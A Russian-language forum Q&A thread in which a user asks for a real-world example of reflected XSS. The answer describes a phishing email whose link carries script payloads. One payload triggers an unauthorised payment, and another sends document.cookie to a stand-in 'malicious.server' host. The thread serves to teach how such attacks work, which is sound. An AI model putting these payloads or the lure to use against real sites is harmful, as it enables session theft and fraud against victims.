Может кто-нибудь дать мне реальный сценарий для рефлексивного xss? - PullRequest
0 голосов
/ 06 декабря 2018

Я исследую XSS и пытаюсь понять различные типы XSS.Большинство документов рассказывают о том, чем они являются, и пытаются объяснить на простом примере. Я достаточно хорошо понял хранимый XSS.

То, что я не понимаю, отражает XSS и то, как это делается в сценарии реального мира.В объяснениях просто говорится о внедрении вредоносного кода, который внедряется в страницу, которую пользователь посещает, щелкая вредоносную ссылку. Но я не понимаю, как и почему они вообще щелкают по такой ссылке.

Если таковые имеютсяВы можете поделиться реальным примером отражающей XSS, это было бы очень полезно.

1 Ответ

0 голосов
/ 06 декабря 2018

"Привет, midhun lc,

Я создал отчет о зарплате, который вы просили, найдите его [здесь].

С уважением, Ваш помощник"

[здесь] естьссылка, которая указывает на https://payrollapplication/reportid=<script>$.post('https://payrollapplication/send_payment?amount=5000&to=assistant')</script> (Очевидно, это также использует CSRF.)

Или [здесь] - ссылка, указывающая на https://payrollapplication/reportid=<script>$.post('malicious.server/?receive=' + document.cookie)</script> для кражи сеанса и других файлов cookie.(Это также использует слабые флаги cookie.)

Или он может просто отправлять любые данные из приложения payrollapplication, к которым жертва может получить доступ.

И так далее.Как именно полезная нагрузка попадает к жертве, конечно, может отличаться.Он может быть во внутреннем документе, отправлен по электронной почте и т. Д.

Добро пожаловать на сайт PullRequest, где вы можете задавать вопросы и получать ответы от других членов сообщества.
...